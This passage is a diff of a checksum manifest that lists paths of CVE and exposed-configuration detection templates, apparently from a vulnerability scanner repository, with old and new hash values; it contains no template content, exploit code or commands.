+http/cves/2023/CVE-2023-2813.yaml:45285b1ddc0a876b112cbf0346813038536659dc
+http/cves/2023/CVE-2023-2822.yaml:504b7a0600567b3faed9fb912f21034dd82c3685
 http/cves/2023/CVE-2023-2825.yaml:c3131064b7add3a0d28c6ee38f1b8f2ec2875e78
-http/cves/2023/CVE-2023-28343.yaml:936f0ed1ddde78a990c03ddc18150543d75bd43f
-http/cves/2023/CVE-2023-28432.yaml:afd4d7e3a65cad906651d511fb769e49d1dbae07
-http/cves/2023/CVE-2023-28665.yaml:d37f733e2a806f5ee97ef6cdea086f3e0da7563b
-http/cves/2023/CVE-2023-29084.yaml:8ee708a219c6a8a2069dabffeaa24598fe8b576d
-http/cves/2023/CVE-2023-29298.yaml:46474215a9464842a5f71ba31a8d78678c13d2d1
-http/cves/2023/CVE-2023-29300.yaml:6abe190149efdbb8d49175dc5b7db9021534f449
+http/cves/2023/CVE-2023-28343.yaml:278df3b4baa43219e64e5ab5d8f31dfc9198a331
+http/cves/2023/CVE-2023-28432.yaml:5b4cf8a825f84864d512de3aa4b2fc7fd1818c55
+http/cves/2023/CVE-2023-28665.yaml:889d17ba2056e8c0ae94a7f42c4ae20ed1257a99
+http/cves/2023/CVE-2023-29084.yaml:0a67baf585f8271a21cfff0f87df20d871f77674
+http/cves/2023/CVE-2023-29298.yaml:1dc1782ac1c5bf5c61fe3c8a0b984bda6be6bda5
+http/cves/2023/CVE-2023-29300.yaml:f1083c48ec36092004f295ba26e1b663ed54534d
 http/cves/2023/CVE-2023-29357.yaml:2e02dbcb85049876950cf3ab071df7b7dcc7a723
 http/cves/2023/CVE-2023-29439.yaml:ae906ea162cbdf4dda0115025190b2cf861a6c0b
-http/cves/2023/CVE-2023-29489.yaml:08f17f052d59571e8eed5d3e7ba857fa04e4bb65
-http/cves/2023/CVE-2023-29622.yaml:e6131965548508c00357b5e4c0c20aa517e5183d
-http/cves/2023/CVE-2023-29623.yaml:9d2187624c10e87835512a2fa6f4bb0d806204b2
-http/cves/2023/CVE-2023-2982.yaml:d49b3bd756676ae1396b0eb03a1de52c2e71dd86
-http/cves/2023/CVE-2023-29887.yaml:e46fd1498dfc3cd92e89ea9164fafc7c64832b89
-http/cves/2023/CVE-2023-29919.yaml:9c7df8a22a220626208918657c4af896f07058e2
-http/cves/2023/CVE-2023-29922.yaml:a511bbf5920388afda15acaca8c9e954d4486d71
-http/cves/2023/CVE-2023-29923.yaml:0bdd8047fe04d6e8556d6faa341a41e65f876fcc
+http/cves/2023/CVE-2023-29489.yaml:88f597dd6615383ce822dff0efa4043ac33d32f9
+http/cves/2023/CVE-2023-29622.yaml:99ef4c0dafa724f7efe898f0594e27dd8b477685
+http/cves/2023/CVE-2023-29623.yaml:cd55520571e0322e483f867c60fe723bcdd8e355
+http/cves/2023/CVE-2023-2982.yaml:bc204c218514dd7ecd8ee67c5c84c6d1af3f42eb
+http/cves/2023/CVE-2023-29887.yaml:957c1d11965ba2e2c3fc325c4371f411a62f92ac
+http/cves/2023/CVE-2023-29919.yaml:da7f2fb309e9a37ee1bf99a8455e5bd75e42999f
+http/cves/2023/CVE-2023-29922.yaml:bae3aff5e61d5f32d9a8d269de00c516774b9bd4
+http/cves/2023/CVE-2023-29923.yaml:2d17123907028315c11dbf4a946a82296240b9ea
 http/cves/2023/CVE-2023-30013.yaml:e019aa8553470d42657e15d76d26e956b8e96924
-http/cves/2023/CVE-2023-30019.yaml:876331d55109ec2f05c5e3fd22809211b9c5432d
-http/cves/2023/CVE-2023-30150.yaml:075d6ee58a88e60f0216337d7f36eacab34f81c7
-http/cves/2023/CVE-2023-30210.yaml:951ece6fe6483abfeea390c453cc5ee604d1e918
-http/cves/2023/CVE-2023-30212.yaml:abfcdbf01767beb31527154cc5aeb119391f6bc0
-http/cves/2023/CVE-2023-30256.yaml:4c3cde493e02b21c864b15f3ba900a69d37c22a7
+http/cves/2023/CVE-2023-30019.yaml:7c871c3f7983a610b29faa78bfd4b8d6d01ac87c
+http/cves/2023/CVE-2023-30150.yaml:35b498670bdc83f37891c25a05f4319a20ef0ff9
+http/cves/2023/CVE-2023-30210.yaml:5a7e1683d4425d79d566e86638df24f0cce45b28
+http/cves/2023/CVE-2023-30212.yaml:1870a39acc9c44afeb4fbf086e862668f9672693
+http/cves/2023/CVE-2023-30256.yaml:2ab64264901b5719dfb6d754ee04918d22f6e6f0
 http/cves/2023/CVE-2023-30258.yaml:06d2d3466030c96310a9c8e0c38047662a2e3a03
 http/cves/2023/CVE-2023-30534.yaml:bf877614d1536ae66dd3600914bbc7a26a79e065
 http/cves/2023/CVE-2023-30625.yaml:f36b268982548a9a12e06168757c9669f101fc69
-http/cves/2023/CVE-2023-30777.yaml:0244ccbfa0f01dc0c0bd2cf251497cf36e4fe3f0
+http/cves/2023/CVE-2023-30777.yaml:475f3d16401556d5e87c739799d909f8fb54c54c
 http/cves/2023/CVE-2023-30868.yaml:bee37d17f414e42da21d9c283ef3946cd5aad986
-http/cves/2023/CVE-2023-30943.yaml:b99694ae05532b28065df48e2cd7207770c17398
-http/cves/2023/CVE-2023-31059.yaml:92b510f387a855ac5d4a81f824bc3a650e574b1a
+http/cves/2023/CVE-2023-30943.yaml:8569372600521f64500bb8fbd5766ab14c3c5b58
+http/cves/2023/CVE-2023-31059.yaml:f65605a966c718e8f5df044d80dc8710bd17243f
 http/cves/2023/CVE-2023-31465.yaml:b585cec62e99e8bd0e0109c04f6937d5929f1288
-http/cves/2023/CVE-2023-31548.yaml:23c74b0a37bcc7e8bbe207366e49ea38c49a4a11
-http/cves/2023/CVE-2023-32117.yaml:c01d07047028ae9e9a7a9eeb21c85dce1caa1a3e
+http/cves/2023/CVE-2023-31548.yaml:5ffe6126f7ae401a1543e1f4434754b58fba981e
+http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
 http/cves/2023/CVE-2023-3219.yaml:3cffb16cb5b6b4ce8bb78b0b43b9ff41cabe82cf
-http/cves/2023/CVE-2023-32235.yaml:f4dde6974e3c59c87e3948cdd44ca2a681903ab1
-http/cves/2023/CVE-2023-32243.yaml:c6302f872218d9e7066a9d5cf6ed0b61c3ef67fa
-http/cves/2023/CVE-2023-32315.yaml:f55c67e5223c6d13769d782e4fb479f9a26318c4
-http/cves/2023/CVE-2023-32563.yaml:cf7f883f6fe45cc7c0f509ff7022c2952110918e
-http/cves/2023/CVE-2023-33338.yaml:32cece5ba29dd0f7de0321f1b5a6cb31a29e7861
+http/cves/2023/CVE-2023-32235.yaml:c8f645afb97f0c062eea4e1728e864038fb2a212
+http/cves/2023/CVE-2023-32243.yaml:787dac0f0325e74790f4e6e44a32169320f98f00
+http/cves/2023/CVE-2023-32315.yaml:97f465fa1145215c90ee4cb590bf8c6fdedbd2df
+http/cves/2023/CVE-2023-32563.yaml:26a5c917b2784c849f5f34a39ee5de9faf4e8b07
+http/cves/2023/CVE-2023-33338.yaml:ddc0a89ddbc3b4dc45924c391b17a08fac2cbe6a
 http/cves/2023/CVE-2023-33405.yaml:cdfcc1cb7eb21be47af0e53a91ec403fd303a521
-http/cves/2023/CVE-2023-33439.yaml:ff66f900d574b3ad4ea1290bfedf7d574e6f62c6
-http/cves/2023/CVE-2023-33440.yaml:42afc4ccaf4ba907a9dbf377eb05be23da60753f
-http/cves/2023/CVE-2023-3345.yaml:9895446faecc4d20c362da094dafe98fcba240e5
-http/cves/2023/CVE-2023-33510.yaml:58cfdfcecf54499db1fe29ccc04314e623ae0d20
-http/cves/2023/CVE-2023-33568.yaml:5e538971d5e6805d7724c58df55e5f564e757279
+http/cves/2023/CVE-2023-33439.yaml:860da0c6ca5288231075ab9e9cc8e1336a0aea38
+http/cves/2023/CVE-2023-33440.yaml:e23de92411d853ecc75e61c7ec6c738404ed4ce0
+http/cves/2023/CVE-2023-3345.yaml:32d94243152c1749ba4bc7718157c9cb216afd2d
+http/cves/2023/CVE-2023-33510.yaml:ff17088baa1f8d63af36c5df60d909022109577e
+http/cves/2023/CVE-2023-33568.yaml:e43289ef96353856ad293fc90839d1bbec6911f2
 http/cves/2023/CVE-2023-33584.yaml:82eb18909f4abb14907d0ef050b8d270e6d43e70
 http/cves/2023/CVE-2023-33629.yaml:313b5659701bb81707ae103623bb41f713c6918e
 http/cves/2023/CVE-2023-3368.yaml:47ae31c627cafa57d17c30cd1ce428c2012b8034
 http/cves/2023/CVE-2023-33831.yaml:fbbac2c5e72e1e8775b0654b232f49fa93d9fbfa
 http/cves/2023/CVE-2023-34020.yaml:2c2061da5887f502224eccbd3a9a2067db134d8e
-http/cves/2023/CVE-2023-34124.yaml:fe7d10ef2f925fff5f84f416f9e777924a71a700
-http/cves/2023/CVE-2023-34192.yaml:70dd106a81856a2a0003ea6ead30105e101a6195
+http/cves/2023/CVE-2023-34124.yaml:957cfc1e38e2a5b18200a503f002427e08c39b66
+http/cves/2023/CVE-2023-34192.yaml:a1280ce2d10f9e059d8a8023db4d2e5dcadc61bc
 http/cves/2023/CVE-2023-34259.yaml:654055c0bbb9d901f6b23e85781fb1c4d0137562
-http/cves/2023/CVE-2023-34362.yaml:66712285f91dd26ca3c3ae8040f21cf30512987f
-http/cves/2023/CVE-2023-34537.yaml:efdaaacdf90623d05914508f561ce00dc0710f58
-http/cves/2023/CVE-2023-34598.yaml:07a623864cd8abe19f23535e9080ffd848a36a77
-http/cves/2023/CVE-2023-34599.yaml:964fbd1d63c3efff1961032445daecdbb8730b59
-http/cves/2023/CVE-2023-3460.yaml:2cf0bfbf1b5285115c7a253dbf53d6cac2f0f65c
-http/cves/2023/CVE-2023-34659.yaml:ca0623f89a3190782d76b87ca689ae73f0c724bf
+http/cves/2023/CVE-2023-34362.yaml:a3818b460b39f7329802e10327826479ed7af8e9
+http/cves/2023/CVE-2023-34537.yaml:e66c351d9f18765d7b6395a91c0eb6b1b30ee61c
+http/cves/2023/CVE-2023-34598.yaml:7e3c0a69b45ce368424d8f7182c35f98ebaf5e2b
+http/cves/2023/CVE-2023-34599.yaml:6efe2d293144c647974277c8d509b1917c25929a
+http/cves/2023/CVE-2023-3460.yaml:7cfca590faadb6977cfd41ef6fee21ad886723c2
+http/cves/2023/CVE-2023-34659.yaml:d481522919a12ff8d2f28cbcfbed36e7852f8821
 http/cves/2023/CVE-2023-34751.yaml:f57e7db1f24b236cf01d91816332dc67e1efe0ea
 http/cves/2023/CVE-2023-34752.yaml:d90aa1cae81ab56b74f9ccaad2e0bc3f4981c725
 http/cves/2023/CVE-2023-34753.yaml:d4dbff42bb6cc2d7b9bf64558ffff678939a62ce
 http/cves/2023/CVE-2023-34755.yaml:b4152f55625f2d4bf08d4d6cf82a1780f5b2a9a6
 http/cves/2023/CVE-2023-34756.yaml:1224ffae4cd13dad0af56dc2cf84333e476fc4de
-http/cves/2023/CVE-2023-3479.yaml:37ab64271a9356afa6b0d611665d8891d013a4d4
-http/cves/2023/CVE-2023-34843.yaml:3cca162308e414d3d4291d30ae9a93da6c6acf8b
-http/cves/2023/CVE-2023-34960.yaml:71ee44e93b407bf4cbac86e7f7c9107d75f61a61
-http/cves/2023/CVE-2023-35078.yaml:3343f73367fe1741369cc0e9e088542d5d6344b9
-http/cves/2023/CVE-2023-35082.yaml:d8fbfca1808dd3a549cc741da1d58e6ed010cacf
+http/cves/2023/CVE-2023-3479.yaml:e667b79d13101685cedf373734d04f7cd74e1a02
+http/cves/2023/CVE-2023-34843.yaml:95b29ace1c005889fbddc2f59f4a935f091be982
+http/cves/2023/CVE-2023-34960.yaml:8e722e45bb866e424a1e2113319f1e900b5e768e
+http/cves/2023/CVE-2023-35078.yaml:a1aae08725b150a8b66c41a08187ab19e29bbfd0
+http/cves/2023/CVE-2023-35082.yaml:fa9ea37d733480a21e32410c94aa31dabe391387
 http/cves/2023/CVE-2023-35813.yaml:d4e78731d4b0c437c5706ef8e0ea8aa96e29452f
-http/cves/2023/CVE-2023-35843.yaml:939260265ee48edc50ebc481b84273659712914c
-http/cves/2023/CVE-2023-35844.yaml:025bf0c47a65030b6a8b22a011120d54b1e631f2
-http/cves/2023/CVE-2023-35885.yaml:1471ea077e0c30ef4076b137289ac1162cb0c55e
+http/cves/2023/CVE-2023-35843.yaml:d4579b8142f077e432af520af5d161ef56d5f2c6
+http/cves/2023/CVE-2023-35844.yaml:ca2643e445ea759ab729ad42da6d68cdaa6a5d00
+http/cves/2023/CVE-2023-35885.yaml:db4be86f91186796611be582cef764b1c1282680
 http/cves/2023/CVE-2023-36144.yaml:970f9e49bd4ec323f386476e9ed6695207a8b2f9
-http/cves/2023/CVE-2023-36287.yaml:2c111c3d57f67cc68e736142c68e9b02ae8d7c67
-http/cves/2023/CVE-2023-36289.yaml:192b1000ffc0fc295c175e88b6249121ef2eea6c
+http/cves/2023/CVE-2023-36287.yaml:fb1ed62d5f62bcb36b3680c382a2b3175045442c
+http/cves/2023/CVE-2023-36289.yaml:419fbb6d7f3e3732270029de091c13eeb292c03d
 http/cves/2023/CVE-2023-36306.yaml:0a650fc3683baa850dd6482bb317d4b984c3ffd2
-http/cves/2023/CVE-2023-36346.yaml:4566ca9215eef24d24bc8f6481aa3af4ee2ad92e
-http/cves/2023/CVE-2023-36844.yaml:06b6da043ef6624b75ec387f26179e60abdda564
-http/cves/2023/CVE-2023-36845.yaml:7f523aa53e3c515734ad243c9a56643c1ed96908
-http/cves/2023/CVE-2023-36934.yaml:de4fe041d35ae4dbaeb63f5232384e50550c045c
+http/cves/2023/CVE-2023-36346.yaml:0236aef5c7b23357b0ec9938b2a0c4de22efcda4
+http/cves/2023/CVE-2023-36844.yaml:1091405a3e1d5172ae3c86d55f23ff373a679f0e
+http/cves/2023/CVE-2023-36845.yaml:ce1e590b9e85e68da4a13bf9b832054bd57df9c3
+http/cves/2023/CVE-2023-36934.yaml:494db0e618bc33f7d356dbc9c9c396a3ee2c710d
 http/cves/2023/CVE-2023-3710.yaml:23f20952ae95dfa9352b0a338a9e31b96c9727e3
-http/cves/2023/CVE-2023-37265.yaml:2b8b4246a1c1f73da31425c61540204ac7ef6477
-http/cves/2023/CVE-2023-37266.yaml:1de2bc7156a317d03735dc272674ec98285dffc5
-http/cves/2023/CVE-2023-37270.yaml:6f83828007ed67bd5892278355806c871988381a
-http/cves/2023/CVE-2023-37462.yaml:5a866e02b9b1a165640798243f1ac72a883b7703
+http/cves/2023/CVE-2023-37265.yaml:58aa1e00a89abd83b90649ef99e67a7b4e858807
+http/cves/2023/CVE-2023-37266.yaml:12c3c68e0204fdb2980b4ec3fce52329507c65be
+http/cves/2023/CVE-2023-37270.yaml:651b97f68376563f5c81117d57970b9968dc47bd
+http/cves/2023/CVE-2023-37462.yaml:74d5d583e9afa83d37f9ff4a3ef8032519f02a71
 http/cves/2023/CVE-2023-37474.yaml:c6be181489a092c2fd1e2fa6b7d4c90017041c28
-http/cves/2023/CVE-2023-37580.yaml:38384323cb936abd603db7e0f11eb6cb5d983a95
-http/cves/2023/CVE-2023-37629.yaml:fcb5aac5c6b4570a38adc1f1ce16332b030f91df
-http/cves/2023/CVE-2023-3765.yaml:b00ec6eea971645e858cc5495b0f2cf27ea0770a
+http/cves/2023/CVE-2023-37580.yaml:7e690ae533f176803645e6db6cb0fbc6ce2a3c6f
+http/cves/2023/CVE-2023-37629.yaml:1d7f1379297f8c1c8304e9496629028bf8c2f89b
+http/cves/2023/CVE-2023-3765.yaml:9cbe682a88b60eb4168cefa62d666b35ddafd2a3
 http/cves/2023/CVE-2023-37679.yaml:f64dd77bace480e4a523bf6226614fd6b3eb0515
 http/cves/2023/CVE-2023-37728.yaml:48e81e4d28c668d534976808e96d39ed3430c590
 http/cves/2023/CVE-2023-37979.yaml:642f169b65d2c3d9bb8fa8b6d0ef683629b36af6
-http/cves/2023/CVE-2023-38035.yaml:3e905e7ebce2c1ada9905ab1822bf438c9222ff4
-http/cves/2023/CVE-2023-38205.yaml:5a9aeedf023ad5adc4bb4ea5dd609481b2ee8f91
+http/cves/2023/CVE-2023-38035.yaml:e0133a345fdb72e54350b452e48a66e0208ac8a6
+http/cves/2023/CVE-2023-38205.yaml:76f86f16fe21643b91e8cfd580c8ab1766fb1a26
 http/cves/2023/CVE-2023-3836.yaml:1995a74bdab51932430eac4cb88a8f55197010ab
 http/cves/2023/CVE-2023-3843.yaml:8988de7f658f97ed6aabe8fe0c6d9d86169fed8a
-http/cves/2023/CVE-2023-38433.yaml:373b523c14841de917e09afeb6477103dcc4dce2
+http/cves/2023/CVE-2023-38433.yaml:226855b931fd55e3b21380ead79df922ae00da9f
 http/cves/2023/CVE-2023-3844.yaml:31a2a1ebbd90e538036aedb726ea31161c993e0e
 http/cves/2023/CVE-2023-3845.yaml:1821083bc14f42c37f14e0f025a37013365c79b2
 http/cves/2023/CVE-2023-3846.yaml:47c230dc77e7d6ee37b7e65dfeb6207e421042a3
@@ -2830,26 +2840,27 @@ http/cves/2023/CVE-2023-3847.yaml:cf84fd3a126d4a4f87c26f321fb316ebd99084f1
 http/cves/2023/CVE-2023-3848.yaml:3fb60f7be7688e2e23aca8a2983ca7323b5dc326
 http/cves/2023/CVE-2023-3849.yaml:6f5b07362633a220be87b22f7c2361a43c79eead
 http/cves/2023/CVE-2023-38501.yaml:dfdcf3b845c256edd1928759d92d0f2eb8381604
-http/cves/2023/CVE-2023-38646.yaml:4d566b82418f322295434bbfcec0d74d6edc22ba
+http/cves/2023/CVE-2023-38646.yaml:d097646365a4318ff1ff0e045facd2d04eba9cbf
 http/cves/2023/CVE-2023-39002.yaml:f179dfb9ff03040780dab4f232c469c1a3e89591
-http/cves/2023/CVE-2023-39026.yaml:fa61845d74c278b5fa49c6839d04f5ab187cf9a4
+http/cves/2023/CVE-2023-39026.yaml:558cefcbdb662739fe53982991605c79f82c4711
 http/cves/2023/CVE-2023-39108.yaml:bd583eb397028f0da06b82bdbe22c229f00b3ad7
 http/cves/2023/CVE-2023-39109.yaml:6ebbc820f9b5321de48ea9c6d449811eaab1254d
 http/cves/2023/CVE-2023-39110.yaml:b089bf8fe2563839e3711138e341e1fd97aecc61
-http/cves/2023/CVE-2023-39120.yaml:c87e59f1d4b9b9866a931b25f81680ac74b646bf
-http/cves/2023/CVE-2023-39141.yaml:bd9bf78f604b185b562499a83382a5374a7dcd20
-http/cves/2023/CVE-2023-39143.yaml:d6ef4d97a314bce19163abedd560fe1d8b5d96b7
-http/cves/2023/CVE-2023-3936.yaml:8930a56131a6dcfd1a732aee60dbe4e10ad77439
-http/cves/2023/CVE-2023-39361.yaml:aa80a529470a2fff08dc3febcd5b43a7d57e0d5d
-http/cves/2023/CVE-2023-39598.yaml:5afa08dac3f2cc3b01c3a2aee2130b24a6b0b394
-http/cves/2023/CVE-2023-39600.yaml:7f7ec4571d5ad9cd87f654b4f5b06ad28f5a5817
-http/cves/2023/CVE-2023-39676.yaml:03a63705c79c1f14e2d894ad70d5df186e1faba8
-http/cves/2023/CVE-2023-39677.yaml:159f1b58126c95aa6f0b3bf3fe68095947460972
+http/cves/2023/CVE-2023-39120.yaml:660394461980f18696f2a202e352194f79cadd01
+http/cves/2023/CVE-2023-39141.yaml:807797e1521149927fec06a4b68d0f7ff461c388
+http/cves/2023/CVE-2023-39143.yaml:2bcd341fd346f5a04d9c5e7c3b3851b565d792c8
+http/cves/2023/CVE-2023-3936.yaml:90cc64ed39701d7c2f1dbb5c72b73ff5ac46ebcf
+http/cves/2023/CVE-2023-39361.yaml:af2931c8a38b6b858c8d5a64d6cc1a6b5cf80f5f
+http/cves/2023/CVE-2023-39598.yaml:7e6db6c87eb98a0640a4a1aca218913b02e11189
+http/cves/2023/CVE-2023-39600.yaml:9bb12543e7bfe8d878368ab06ffac29fff4d7e61
+http/cves/2023/CVE-2023-39676.yaml:3993cd8656b47a24fc6f0d9c26b91c4ee3279ca6
+http/cves/2023/CVE-2023-39677.yaml:5f23e2784db060d76deb29ba8f1449523e9390ac
 http/cves/2023/CVE-2023-39700.yaml:7e89c3315d82f7eb623021e9e3812d93361e5a32
 http/cves/2023/CVE-2023-39796.yaml:39d6d477b6dacf6388d38d92f90c1924d51ceb4b
 http/cves/2023/CVE-2023-40208.yaml:7b0f0811421a369d97f6ddad747e4e34cd4de342
 http/cves/2023/CVE-2023-40779.yaml:606ab574bdb041a1a70ce822a17dad5fba2388b3
 http/cves/2023/CVE-2023-4110.yaml:be1df10ec9e0589fdcd3d72c5599b23439cefe47
+http/cves/2023/CVE-2023-41109.yaml:e38cdea33e8b097b30a7093caba3e42fac4b61f2
 http/cves/2023/CVE-2023-4111.yaml:9f9021d4f0fbc847c986e0ec53c5ed13a1a72105
 http/cves/2023/CVE-2023-4112.yaml:2a55b9ac24b30812fc788b5bac83c6540f415a8e
 http/cves/2023/CVE-2023-4113.yaml:66192ea8eea88858da517ed33c4c023faa9da820
@@ -2863,11 +2874,12 @@ http/cves/2023/CVE-2023-41538.yaml:218d593117edafe310c4e96fba39c51c234f65f6
 http/cves/2023/CVE-2023-41642.yaml:b4ffdad63aab3a5147d5b49eee605f32b9248d9b
 http/cves/2023/CVE-2023-4168.yaml:e8c9190b1c143813f0107a2599443d57b267ca50
 http/cves/2023/CVE-2023-4169.yaml:baa66871383cde3b1c852cfbf1899139edadfdc7
-http/cves/2023/CVE-2023-4173.yaml:dd8fc306806e02e32b2b65c1724af7d2e98a0750
-http/cves/2023/CVE-2023-4174.yaml:198a66f32f2380336f28a80f9d01a011be85d734
+http/cves/2023/CVE-2023-4173.yaml:0f35deeba302f09ef04fff8675f7c2fc5310674b
+http/cves/2023/CVE-2023-4174.yaml:490546890562c18f06e49bdc58178adbb8945f68
 http/cves/2023/CVE-2023-41763.yaml:5309f08e84061f05237d084a16c52c437e6c0a77
-http/cves/2023/CVE-2023-41892.yaml:c3c96a50f998019eb2f4758715690854c33eb55a
-http/cves/2023/CVE-2023-42442.yaml:9a20ac3bf72a03abc2e2e5bd5e5b71a78d9cac6c
+http/cves/2023/CVE-2023-41892.yaml:b23710917e2323e438e71cd288ad75ecbe2a4c92
+http/cves/2023/CVE-2023-42343.yaml:5977d03c2300080323e25ce1a64ec9e6c116aba2
+http/cves/2023/CVE-2023-42442.yaml:2e2bc050a55e9bb5fb5f1ba499bd478baf63c814
 http/cves/2023/CVE-2023-42793.yaml:996b31479d926952afef3be9af399801d7034027
 http/cves/2023/CVE-2023-43177.yaml:56bd157549c16eb05221a59aab962165b4bf992c
 http/cves/2023/CVE-2023-43261.yaml:4adda5af675285522fc5d6908be3dcbdff86870b
@@ -2878,13 +2890,14 @@ http/cves/2023/CVE-2023-4415.yaml:156508c23391f2251fd8012516a93dee6b020387
 http/cves/2023/CVE-2023-4451.yaml:9011e3404e10122e739921d74ceabbd7676f6d5e
 http/cves/2023/CVE-2023-4547.yaml:9cb26b11a6c1f4cca2e1438e2839bde7ea87a7ea
 http/cves/2023/CVE-2023-45542.yaml:90a902782d701c2efe8692e8d2098193df946371
-http/cves/2023/CVE-2023-4568.yaml:0bd963794f42d4383e64913b7b879782ceec2054
+http/cves/2023/CVE-2023-4568.yaml:b782b4b76b34c496184cb689e0e20c41c22b4b3e
 http/cves/2023/CVE-2023-45852.yaml:7a4038ad99644855dfe6f39ac7e92fd73a3d60d2
 http/cves/2023/CVE-2023-4596.yaml:bde7e510ccbbc29b43e191885a24e24f57f61e10
-http/cves/2023/CVE-2023-4634.yaml:daab5c713c8bd42dfa868fa9532bdd100717a39a
+http/cves/2023/CVE-2023-4634.yaml:3144a8482f9a773afe1f4e057c1aaf2c5a2179a6
 http/cves/2023/CVE-2023-46359.yaml:d59f73a4697ea1c18976e3856588c47a78c31d7b
+http/cves/2023/CVE-2023-46574.yaml:6ace2075b83e46ad50e0948d07307e229fc5762a
 http/cves/2023/CVE-2023-46747.yaml:6b2841039a71d5b669379deccc0c4a486a2d0375
-http/cves/2023/CVE-2023-4714.yaml:dc45b7ef7c33406421a4adeceb368adf378546a8
+http/cves/2023/CVE-2023-4714.yaml:3c9e8ca7c46bd819619526ad437977226713c9f7
 http/cves/2023/CVE-2023-47246.yaml:5a472de48a5400547843cc0f0a2a647a7e96c801
 http/cves/2023/CVE-2023-49070.yaml:c4c6163af61c95881ef26c181ea126bbb14197f7
 http/cves/2023/CVE-2023-49103.yaml:84c40fe76668d9f247c1e0f307c657052945a9e9
@@ -4097,7 +4110,7 @@ http/exposures/configs/awstats-script.yaml:75fc7b43e6ad9f08e8d2ba61160d606c75252
 http/exposures/configs/azure-domain-tenant.yaml:537cfd449ad2413268752cb92200e3582ee0ea82
 http/exposures/configs/babel-config-exposure.yaml:e3b7be4f09d41013125edd362cc94b181fe40e9f
 http/exposures/configs/behat-config.yaml:050530632c7cf5f4ae9c6eaf57c98a9e2a255fa0
-http/exposures/configs/blazor-boot.yaml:ed6e276dd7bac8b0ebf6b7ebe1c7ff2fdbedca49
+http/exposures/configs/blazor-boot.yaml:046d24d6986d4d88f159b8988e957d035522309d
 http/exposures/configs/cakephp-config.yaml:e1f8bcbd3b9e008d9ff4c5f93c716adc83bcf32e
 http/exposures/configs/cgi-printenv.yaml:7c92dc17471fda7db954fb5dc29ca330eb0007b3
 http/exposures/configs/circleci-config.yaml:851472c99b952647f42bb5b5201acc48b48fe3e6
@@ -4105,10 +4118,10 @@ http/exposures/configs/circleci-ssh-config.yaml:03053360752de5b3c8eff7878db3d499
 http/exposures/configs/cisco-network-config.yaml:46a9ab545e6afe26ab45ab8d877b2eb5e7c00528
 http/exposures/configs/codeception-config.yaml:b8e0211cf76bc08551a28c3aa6222129a5bb6046
 http/exposures/configs/codeigniter-env.yaml:41032af76ab9639edfe558f7bc6f41d3145948f9
-http/exposures/configs/collibra-properties.yaml:0ff9492483d0d297cdc28c4360765fd3c7dfe8cd
+http/exposures/configs/collibra-properties.yaml:caa73094677819533764ba533bf75cf29c253a22
 http/exposures/configs/composer-config.yaml:fdd1f6dafbfd99991e8854891fd908df0bce02cc
 http/exposures/configs/config-json.yaml:5677b51216f1e994a49712960cb17da4ecd2f7f3
-http/exposures/configs/config-properties.yaml:b0bc98e81f2dbb00b1556c99f099e24e4cc33939
+http/exposures/configs/config-properties.yaml:06ed728393febe32a30cbe4aa0de7b5cf7ab4320
 http/exposures/configs/config-rb.yaml:f0a8007213cb4861bf6c03d367291b6643c37046
 http/exposures/configs/configuration-listing.yaml:c0ea3a6516cbcf350df244ac15a465b79c0af8e3
 http/exposures/configs/coremail-config-disclosure.yaml:563dbe0297d0e215ef1e44074565a6ad3cf348ab
@@ -4137,7 +4150,7 @@ http/exposures/configs/gcloud-config-default.yaml:91ae35f1db1a63605f03aebdda8ed4
 http/exposures/configs/git-config-nginxoffbyslash.yaml:e1fe3f12d81ad560370580fc085f5f80051844be
 http/exposures/configs/git-config.yaml:e7b738f8c9c538c765692b604f0c4fb7c52178da
 http/exposures/configs/git-credentials-disclosure.yaml:30d02d28216137859679efbb3dfdda8d48bafb25
-http/exposures/configs/github-workflows-disclosure.yaml:2d363f961f3e7cd50bebb233b8378545497810de
+http/exposures/configs/github-workflows-disclosure.yaml:a25d0ca3abfc95b58825280c151a63de5ea35edf
 http/exposures/configs/gmail-api-client-secrets.yaml:e988f2ff2b80b3d4e4ed975703d9067f90870377
 http/exposures/configs/golangci-config.yaml:ea42c47f17b1570b08e15dbc771505c104b93321
 http/exposures/configs/gruntfile-exposure.yaml:4b036ae60497d765118208537796958948527e6b
@@ -4149,9 +4162,9 @@ http/exposures/configs/htpasswd-detection.yaml:85d70d2f80a023eaa0343438ab8cfb3e5
 http/exposures/configs/httpd-config.yaml:ce648521695a5e88cdb735f3178dc5b833ffb20a
 http/exposures/configs/javascript-env.yaml:2d46ab9663a34a0daccda73e5e401fd092449c91
 http/exposures/configs/jetbrains-datasources.yaml:e9575e9fd597bf9b58c6125cf79e1c1cdfab7794
-http/exposures/configs/jkstatus-manager.yaml:3b13ec55616f9faacdbbdbe8a7be244142f10def
+http/exposures/configs/jkstatus-manager.yaml:5a927efd397af7ad5659e348b8b1d3bacf1b5f0c
 http/exposures/configs/joomla-config-file.yaml:4fbdde5bf9a54a875bca43f1a84a0d80f34701ba
-http/exposures/configs/jsconfig-json.yaml:d242a5ff0b0ff82e533bc9778c5a7f591d51f991
+http/exposures/configs/jsconfig-json.yaml:2b4eef2963c707feef05c1953816da94d1a33185
 http/exposures/configs/karma-config-js.yaml:0ef25cc1986c133be7cba2144ecd6cc287c3c4b9
 http/exposures/configs/keycloak-openid-config.yaml:42ffdd485eb9de21b1cfdc3c631e384151ad5281
 http/exposures/configs/kubernetes-kustomization-disclosure.yaml:eb652b556472ef31b9d25b651c66780796ef87fa
@@ -4174,7 +4187,7 @@ http/exposures/configs/package-json.yaml:b466752e1b0d48e571e1dabde57d3f2eaedc87a
 http/exposures/configs/parameters-config.yaml:82fe94f5fbcd98909a16ec2cad822f09ca7c35c9
 http/exposures/configs/perl-status.yaml:7b43900d0e45cb9559ff5e83ca7c55c7cce03800
 http/exposures/configs/phalcon-framework-source.yaml:14477a9efaa9961acae9277a1b664947595f0ea0
-http/exposures/configs/phinx-config.yaml:610ec30b9267472b1b4df03baea851ca13c53e88
+http/exposures/configs/phinx-config.yaml:397a9292412cdb577652aff8a8a5e1e6365eb252
 http/exposures/configs/php-fpm-config.yaml:961bddcacbdbd52f131b0e3ee197efca68dc0039
 http/exposures/configs/phpcs-config.yaml:ea8ba01aef023ac28c1e57995061f1154eddc781
 http/exposures/configs/phpinfo-files.yaml:ab41a03eb5be493c26e7759e8cedd85bbae37f21
@@ -4226,10 +4239,11 @@ http/exposures/configs/web-config.yaml:ac0b5c14b138445f154387923c85d855b198c912
 http/exposures/configs/webpack-config.yaml:febe4803184651249e95775d010a3c796d571bf3
